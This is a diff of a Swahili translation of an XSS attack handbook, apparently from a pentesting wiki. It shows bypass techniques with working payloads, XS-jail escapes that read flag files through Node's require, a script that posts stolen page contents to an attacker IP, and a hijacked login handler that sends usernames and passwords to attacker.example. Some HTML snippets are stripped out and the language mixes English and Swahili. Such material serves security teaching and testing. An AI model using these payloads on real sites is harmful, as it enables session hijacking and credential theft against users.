msaada ili admin akupe msaada atakuwa anaona kile unachoona katika session yako lakini kutoka session yake. +Ikiwa unatambua self XSS na ukurasa wa wavuti una **session mirroring kwa administrators**, kwa mfano kuruhusu wateja kuomba msaada na ili admin akupe msaada atakuwa akiangalia kile unachoona katika session yako lakini kwa session yake. -Unaweza kumfanya **administrator trigger your self XSS** na kumpora cookies/session yake. +Unaweza kufanya **msimamizi asababisha self XSS yako** na kuiba cookies/session zake. + +## Njia nyingine za kupita + +### Kupita sanitization kupitia WASM linear-memory template overwrite + +Wakati web app inapotumia Emscripten/WASM, constant strings (kama HTML format stubs) zinaishi kwenye writable linear memory. Overflow moja ndani ya WASM (mfano, memcpy isiyochunguzwa kwenye njia ya uhariri) inaweza kuharibu miundo jirani na kuelekeza maandishi kwenye constant hizo. Kuandika upya template kama "

%.*s

" hadi "" kunageuza input iliyosanitiwa kuwa thamani ya handler ya JavaScript na kusababisha DOM XSS mara moja wakati wa render. + +Angalia ukurasa maalum wenye mtiririko wa exploitation, DevTools memory helpers, na mbinu za ulinzi: + +{{#ref}} +wasm-linear-memory-template-overwrite-xss.md +{{#endref}} -## Other Bypasses ### Normalised Unicode -Unaweza kuangalia kama **reflected values** zinafanyiwa **unicode normalized** kwenye server (au upande wa client) na kutumia kazi hii kuingia kando ya ulinzi. [**Find an example here**](../unicode-injection/index.html#xss-cross-site-scripting). +Unaweza kuangalia kama **reflected values** zinafanyiwa **unicode normalized** upande wa server (au upande wa client) na kutumia vibaya utendakazi huu kupita ulinzi. [**Pata mfano hapa**](../unicode-injection/index.html#xss-cross-site-scripting). ### PHP FILTER_VALIDATE_EMAIL flag Bypass ```javascript @@ -824,16 +832,16 @@ Unaweza kuangalia kama **reflected values** zinafanyiwa **unicode normalized** k ``` ### Ruby-On-Rails bypass -Kutokana na **RoR mass assignment** nukuu zinaingizwa ndani ya HTML na kisha kikomo cha nukuu kinavunjwa na mashamba ya ziada (onfocus) yanaweza kuongezwa ndani ya tag.\ +Kutokana na **RoR mass assignment** alama za nukuu zinaingizwa kwenye HTML, na hivyo kikomo cha nukuu kinaweza kupitishwa na mashamba ya ziada (onfocus) yanaweza kuongezwa ndani ya tag.\ Mfano wa fomu ([from this report](https://hackerone.com/reports/709336)), ikiwa utatuma payload: ``` contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa ``` -Jozi "Key","Value" itarudishwa kama hii: +Jozi "Key","Value" itarudishwa kama ifuatavyo: ``` {" onfocus=javascript:alert('xss') autofocus a"=>"a"} ``` -Kisha, onfocus attribute itaingizwa na XSS itatokea. +Kisha, attribute onfocus itaingizwa na XSS itatokee. ### Mchanganyiko maalum ```html @@ -865,24 +873,24 @@ Kisha, onfocus attribute itaingizwa na XSS itatokea. window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2) document['default'+'View'][`\u0061lert`](3) ``` -### XSS na injection ya header katika response ya 302 +### XSS with header injection in a 302 response -Ukipata kuwa unaweza **kuingiza headers katika 302 Redirect response** unaweza kujaribu **kumfanya browser itekeleze arbitrary JavaScript**. Hii si rahisi kwani browsers za kisasa hazitafsiri HTTP response body ikiwa HTTP response status code ni 302, hivyo payload ya cross-site scripting pekee haitakuwa na faida. +Ikiwa ugundua kuwa unaweza **inject headers in a 302 Redirect response** unaweza kujaribu **make the browser execute arbitrary JavaScript**. Hii si rahisi kama ilivyo kawaida kwa sababu modern browsers hazitafsiri HTTP response body ikiwa HTTP response status code ni 302, hivyo just a cross-site scripting payload haifai. -Katika [**this report**](https://www.gremwell.com/firefox-xss-302) na [**this one**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/) unaweza kusoma jinsi unavyoweza kujaribu protocols kadhaa ndani ya Location header na kuona ikiwa yoyote yao inaruhusu browser kukagua na kutekeleza payload ya XSS ndani ya body.\ +In [**this report**](https://www.gremwell.com/firefox-xss-302) and [**this one**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/) unaweza kusoma jinsi ya kujaribu protokoli kadhaa ndani ya Location header na kuona kama yoyote yao inaruhusu browser kuchunguza na execute XSS payload ndani ya body.\ Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location header_, `resource://`. -### Herufi, Nambari na Nukta Pekee +### Herufi Pekee, Nambari na Nukta -Ikiwa unaweza kubainisha **callback** ambayo javascript itakayokuwa **itekelezwe** ikiwa imepunguzwa kwa herufi, nambari na nukta tu. [**Read this section of this post**](#javascript-function) ili kujifunza jinsi ya kuudanganya tabia hii. +If you are able to indicate the **callback** that javascript is going to **execute** limited to those chars. [**Read this section of this post**](#javascript-function) to find how to abuse this behaviour. -### Valid ` ``` Jibu ni: -- **module** (default, hakuna cha kuelezea) -- [**webbundle**](https://web.dev/web-bundles/): Web Bundles ni kipengele kinachokuwezesha kukusanya data nyingi (HTML, CSS, JS…) pamoja ndani ya faili la **`.wbn`**. +- **module** (chaguo-msingi, hakuna cha kufafanua) +- [**webbundle**](https://web.dev/web-bundles/): Web Bundles ni kipengele kinachokuruhusu kuweka pamoja data nyingi (HTML, CSS, JS…) katika faili ya **`.wbn`**. ```html The resources are loaded from the source .wbn, not accessed via HTTP ``` -- [**importmap**](https://github.com/WICG/import-maps)**:** Inaruhusu kuboresha sintaksi ya import +- [**importmap**](https://github.com/WICG/import-maps)**:** Inaruhusu kuboresha import syntax ```html ``` -Tabia hii ilitumiwa katika [**this writeup**](https://github.com/zwade/yaca/tree/master/solution) kurekebisha maktaba ili kutumia eval; kuitumia vibaya kunaweza kusababisha XSS. +Tabia hii ilitumika katika [**this writeup**](https://github.com/zwade/yaca/tree/master/solution) kuremapa laibrari kwa eval ili kuitumia vibaya — inaweza kusababisha XSS. -- [**speculationrules**](https://github.com/WICG/nav-speculation)**:** Kipengele hiki hasa kimekusudiwa kutatua baadhi ya matatizo yanayosababishwa na pre-rendering. Kinafanya kazi kama ifuatavyo: +- [**speculationrules**](https://github.com/WICG/nav-speculation)**:** Kipengele hiki hasa kilikusudiwa kutatua baadhi ya matatizo yanayosababishwa na pre-rendering. Kinafanya kazi hivi: ```html ``` -### Web Content-Types kwa XSS +### Content-Types za Web kwa XSS (Kutoka [**here**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) Aina zifuatazo za Content-Types zinaweza kutekeleza XSS katika browsers zote: @@ -967,15 +975,15 @@ Tabia hii ilitumiwa katika [**this writeup**](https://github.com/zwade/yaca/tree - application/xml - text/xml - image/svg+xml -- text/plain (?? not in the list but I think I saw this in a CTF) +- text/plain (?? haipo kwenye orodha lakini nadhani niliona hii kwenye CTF) - application/rss+xml (off) - application/atom+xml (off) -Katika browsers nyingine, **`Content-Types`** nyingine zinaweza kutumika kutekeleza arbitrary JS, angalia: [https://github.com/BlackFan/content-type-research/blob/master/XSS.md](https://github.com/BlackFan/content-type-research/blob/master/XSS.md) +Katika browsers nyingine, aina nyingine za **`Content-Types`** zinaweza kutumika kuendesha JS yoyote, angalia: [https://github.com/BlackFan/content-type-research/blob/master/XSS.md](https://github.com/BlackFan/content-type-research/blob/master/XSS.md) ### xml Content Type -Ikiwa ukurasa unarudisha content-type text/xml, inawezekana kuonyesha namespace na kutekeleza arbitrary JS: +Kama ukurasa unarudisha text/xml content-type, inawezekana kuonyesha namespace na kuendesha JS yoyote: ```xml hello @@ -987,9 +995,9 @@ Ikiwa ukurasa unarudisha content-type text/xml, inawezekana kuonyesha namespace Wakati kitu kama **`"some {{template}} data".replace("{{template}}", )`** kinapotumika. Mshambuliaji anaweza kutumia [**special string replacements**](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/replace#specifying_a_string_as_the_replacement) kujaribu kuvuka baadhi ya kinga: `` "123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"})) `` -Kwa mfano katika [**this writeup**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA), hili lilitumika ku-escape string ya JSON ndani ya script na kutekeleza code yoyote. +Kwa mfano katika [**this writeup**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA), hili lilitumika kwa **ku-escape JSON string** ndani ya script na kutekeleza arbitrary code. -### Cache ya Chrome kwa XSS +### Chrome Cache to XSS {{#ref}} @@ -998,7 +1006,7 @@ chrome-cache-to-xss.md ### XS Jails Escape -Ikiwa una idadi ndogo tu ya characters za kutumia, angalia suluhisho hizi nyingine zinazofaa kwa matatizo ya XSJail: +Ikiwa una seti ndogo tu ya chars za kutumia, angalia suluhisho hizi nyingine sahihi kwa matatizo ya XSJail: ```javascript // eval + unescape + regex eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))() @@ -1029,22 +1037,22 @@ constructor(source)() // For more uses of with go to challenge misc/CaaSio PSE in // https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE ``` -Ikiwa **everything is undefined** kabla ya kutekeleza untrusted code (kama katika [**this writeup**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/index.html#miscx2fundefined55-solves)) inawezekana kuunda vitu vinavyofaa "out of nothing" ili kutumia vibaya utekelezaji wa arbitrary untrusted code: +Iwapo **everything is undefined** kabla ya kuendesha untrusted code (kama katika [**this writeup**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/index.html#miscx2fundefined55-solves)), inawezekana kuunda vitu muhimu "out of nothing" ili kuabusu execution ya arbitrary untrusted code: - Using import() ```javascript // although import "fs" doesn’t work, import('fs') does. import("fs").then((m) => console.log(m.readFileSync("/flag.txt", "utf8"))) ``` -- Kufikia `require` kwa njia isiyo ya moja kwa moja +- Kupata `require` kwa njia isiyo ya moja kwa moja -[Kulingana na hii](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050) modules hufunikwa na Node.js ndani ya function, kama ifuatavyo: +[Kulingana na hii](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050) moduli zimefungwa na Node.js ndani ya function, kama ifuatavyo: ```javascript ;(function (exports, require, module, __filename, __dirname) { // our actual module code }) ``` -Kwa hivyo, ikiwa kutoka kwenye module hiyo tunaweza **kuitisha function nyingine**, inawezekana kutumia `arguments.callee.caller.arguments[1]` kutoka kwenye function hiyo kupata **`require`**: +Hivyo, ikiwa kutoka module hiyo tunaweza **call another function**, inawezekana kutumia `arguments.callee.caller.arguments[1]` kutoka function hiyo kufikia **`require`**: ```javascript ;(function () { return arguments.callee.caller.arguments[1]("fs").readFileSync( @@ -1053,7 +1061,7 @@ return arguments.callee.caller.arguments[1]("fs").readFileSync( ) })() ``` -Kwa njia inayofanana na mfano uliopita, inawezekana **use error handlers** kufikia **wrapper** ya module na kupata **`require`** function: +Kwa njia sawa na mfano uliopita, inawezekana **use error handlers** kufikia **wrapper** ya module na kupata **`require`** function: ```javascript try { null.f() @@ -1093,12 +1101,12 @@ trigger() ``` ### Obfuscation & Advanced Bypass -- **Obfuscations tofauti katika ukurasa mmoja:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/) +- **Different obfuscations kwenye ukurasa mmoja:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/) - [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js) - [https://javascriptobfuscator.herokuapp.com/](https://javascriptobfuscator.herokuapp.com) - [https://skalman.github.io/UglifyJS-online/](https://skalman.github.io/UglifyJS-online/) - [http://www.jsfuck.com/](http://www.jsfuck.com) -- Mbinu za JSFuck zilizo ngumu zaidi: [https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce) +- JSFuck ya hali ya juu zaidi: [https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce) - [http://utf-8.jp/public/jjencode.html](http://utf-8.jp/public/jjencode.html) - [https://utf-8.jp/public/aaencode.html](https://utf-8.jp/public/aaencode.html) - [https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses](https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses) @@ -1274,7 +1282,7 @@ o゚ー゚o = (゚ω゚ノ + "_")[c ^ _ ^ o] ``` ## XSS payloads za kawaida -### Payloads kadhaa katika 1 +### Payloads kadhaa ndani ya 1 {{#ref}} @@ -1283,7 +1291,7 @@ steal-info-js.md ### Iframe Trap -Lazimisha mtumiaji avinjari kwenye ukurasa bila kutoka katika iframe na uibe vitendo vyake (ikiwa ni pamoja na taarifa zilizotumwa kwenye fomu): +Mfanye mtumiaji avinjari kwenye ukurasa bila kutoka kwenye iframe na uibe vitendo vyake (ikijumuisha taarifa zilizotumwa kwenye fomu): {{#ref}} @@ -1313,9 +1321,9 @@ Lazimisha mtumiaji avinjari kwenye ukurasa bila kutoka katika iframe na uibe vit ``` > [!TIP] -> Hutaweza **kufikia cookies kutoka JavaScript** ikiwa bendera ya HTTPOnly imewekwa kwenye cookie. Lakini hapa kuna [njia kadhaa za kuzunguka ulinzi huu](../hacking-with-cookies/index.html#httponly) ikiwa utakuwa na bahati. +> Hutaweza **kupata cookies kutoka kwa JavaScript** ikiwa flag ya HTTPOnly imewekwa kwenye cookie. Lakini hapa una [njia kadhaa za kuipita ulinzi huu](../hacking-with-cookies/index.html#httponly) ikiwa una bahati. -### Kuiba Yaliyomo ya Ukurasa +### Kunyakua Maudhui ya Ukurasa ```javascript var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8" var attacker = "http://10.10.14.8/exfil" @@ -1328,7 +1336,7 @@ fetch(attacker + "?" + encodeURI(btoa(xhr.responseText))) xhr.open("GET", url, true) xhr.send(null) ``` -### Pata anwani za IP za ndani +### Tafuta IPs za ndani ```html ``` @@ -1427,7 +1435,7 @@ When any data is introduced in the password field, the username and password is ### Hijack form handlers to exfiltrate credentials (const shadowing) -Ikiwa handler muhimu (mfano, `function DoLogin(){...}`) inatangazwa baadaye kwenye ukurasa, na payload yako inaendesha mapema (mfano, via an inline JS-in-JS sink), fafanua `const` yenye jina sawa kwanza ili kuzuia na kufunga handler. Taarifa za function zinazotangazwa baadaye haziwezi rebind jina la `const`, zikiacha hook yako ikiwa ndani ya udhibiti: +Iwapo handler muhimu (mfano, `function DoLogin(){...}`) itatangazwa baadaye kwenye ukurasa, na payload yako ikafanya kazi mapema (mfano, via an inline JS-in-JS sink), tengeneza `const` yenye jina lile kwanza ili kuchukua nafasi na kufunga handler. Matangazo ya function baadaye hayawezi rebind jina la `const`, na hivyo kuiacha hook yako ikidhibiti: ```javascript const DoLogin = () => { const pwd = Trim(FormInput.InputPassword.value); @@ -1435,19 +1443,19 @@ const user = Trim(FormInput.InputUtente.value); fetch('https://attacker.example/?u='+encodeURIComponent(user)+'&p='+encodeURIComponent(pwd)); }; ``` -Vidokezo +Notes - Hii inategemea mpangilio wa utekelezaji: injection yako lazima itekelezwe kabla ya tamko halali. -- Ikiwa payload yako imefungwa ndani ya `eval(...)`, bindings za `const/let` hazitakuwa globals. Tumia dynamic ` ``` -### Kuuibia ujumbe za PostMessage +### Kuiba ujumbe za PostMessage ```html